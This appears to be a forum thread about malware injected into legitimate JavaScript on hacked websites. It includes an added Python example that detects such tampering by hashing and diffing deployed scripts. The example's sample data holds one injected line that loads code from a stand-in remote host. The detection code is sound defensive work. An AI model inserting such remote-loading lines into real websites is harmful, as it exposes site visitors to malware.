Malware injected into legitimate JavaScript code on legitimate websites

JMH

As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.

A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.

The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.

Malware injected into legitimate JavaScript code on legitimate websites | Naked Security
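One way a site owner can catch this kind of tampering, as an added example that is not part of the original thread or the Sophos article: compare each deployed script against a known-good hash manifest and list the lines that were inserted. The file paths, file contents and the `injected.example` host are constructed sample data.

```python
import difflib
import hashlib

# Constructed sample data: known-good copies of the site's scripts (e.g. from
# version control) and what the web server is currently serving.
KNOWN_GOOD = {
    "/js/menu.js": "function toggleMenu(id) {\n  var el = document.getElementById(id);\n  el.hidden = !el.hidden;\n}\n",
    "/js/track.js": "function track(evt) {\n  console.log(evt);\n}\n",
}
DEPLOYED = {
    "/js/menu.js": KNOWN_GOOD["/js/menu.js"]
    + "/* constructed injected line */ loadRemote('//injected.example/x.js');\n",
    "/js/track.js": KNOWN_GOOD["/js/track.js"],
}


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_manifest(files):
    """Map each script path to the SHA-256 of its known-good content."""
    return {path: sha256(body) for path, body in files.items()}


def added_lines(good, current):
    """Lines present in the deployed file but not in the known-good copy."""
    diff = difflib.ndiff(good.splitlines(), current.splitlines())
    return [line[2:] for line in diff if line.startswith("+ ")]


def audit(manifest, known_good, deployed):
    """Return {path: finding} for every script that deviates from the manifest."""
    findings = {}
    for path, body in deployed.items():
        if path not in manifest:
            findings[path] = {"status": "unexpected", "added": body.splitlines()}
        elif sha256(body) != manifest[path]:
            findings[path] = {"status": "modified",
                              "added": added_lines(known_good[path], body)}
    for path in manifest.keys() - deployed.keys():
        findings[path] = {"status": "missing", "added": []}
    return findings


if __name__ == "__main__":
    for path, f in audit(build_manifest(KNOWN_GOOD), KNOWN_GOOD, DEPLOYED).items():
        print(path, f["status"], f["added"])
```

The hash comparison flags a changed file even though it is still served from the trusted site, and the diff shows the responder exactly which lines were added to the otherwise legitimate script.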
 
Sounds a lot like XSS to me, which is nothing super new, yet I still see the mistake by lots of web admins of not protecting against something so simple.
 